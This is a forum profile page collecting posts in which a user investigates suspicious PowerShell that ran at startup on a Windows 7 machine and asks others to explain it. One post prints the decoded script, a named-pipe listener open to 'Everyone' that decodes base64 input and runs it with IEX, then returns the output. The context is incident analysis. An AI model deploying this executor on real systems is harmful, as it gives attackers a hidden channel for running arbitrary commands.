Jump to content

NotAdmin

Members
  • Posts

    4
  • Joined

  • Last visited

About NotAdmin

  • Rank
    Newbie
    Newbie

Profile Information

  • Location
    Italy

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Yes i already used Autoruns to check for rubbish running at startup but i didn't find any suspicious activity/process. It's really strange...
  2. Apologize me if i was not clear, I try to explain better the point. I received an alert of suspicious Powershell execution at a certain time and related obfuscated command was retrieved by the antimalware (in other words, i know what was executed, but i've to understand why). So, after analysis i saw that Powershell was triggered by cmd.exe but no other parent processes were found because this happened at system startup and i do not have other elements to continue the investigation (i'm thinking that something in autoexec has been compromised). In the meantime, i tried to deobfuscate the Powershell script (base64 encoded) and i finally managed the attached commands. At the moment i know what, when, who, where, how... I need to understand why! :)
  3. Hi itman, I tried to locate the script but Powershell came from cmd.exe (we are talking about a Win7 environment) and no other parent processes were found. This process (cmd.exe, that execute powershell.exe) was triggered 5-6 times at system startup, without any particular "pattern" (it seems a random process): just to say, powershell execution detected on Monday, and then another event 4 day later, another after 7, and so on. The event viewer didn't record any particular event in these specific timeframes. N.B.: the powershell script was obfuscated, i decoded it and what i pasted it's the clear text command. Many many thanks!
  4. Hi all, i've detected an attempt to execute Powershell command on a machine and after have decoding it, i retrieved these commands: $pn = "awkywlhbod" $pm = "xnopgdzmw6" $sb = { param ($pn, $pm) add-Type -assembly "System.Core" $ps = New-Object System.IO.Pipes.PipeSecurity $ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" ) $ps.AddAccessRule($ar) $p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps) $p.WaitForConnection(); $pr = new-object System.IO.StreamReader($p) $o = $pr.ReadLine() $p.Dispose(); $pr.Dispose(); $s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | out-string $o = IEX $s |out-string $ps = New-Object System.IO.Pipes.PipeSecurity $ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" ) $ps.AddAccessRule($ar) $p = New-Object System.IO.Pipes.NamedPipeServerStream($pm,"InOut",100, "Byte", "None", 1024, 1024, $ps) $p.WaitForConnection(); $pw = new-object System.IO.StreamWriter($p) $pw.AutoFlush = $true $pw.WriteLine($o); $p.Dispose(); } add-Type -assembly "System.Core" $t = start-job -ScriptBlock $sb -ArgumentList @($pn, $pm) $pl = new-object System.IO.Pipes.NamedPipeClientStream(".", $pn); $pp = new-object System.IO.Pipes.NamedPipeClientStream(".", $pm); Start-Sleep 600 $t.StopJob() Is there anyone who can help me to understand what this stand for? Thank you very much in advance!!
×
×
  • Create New...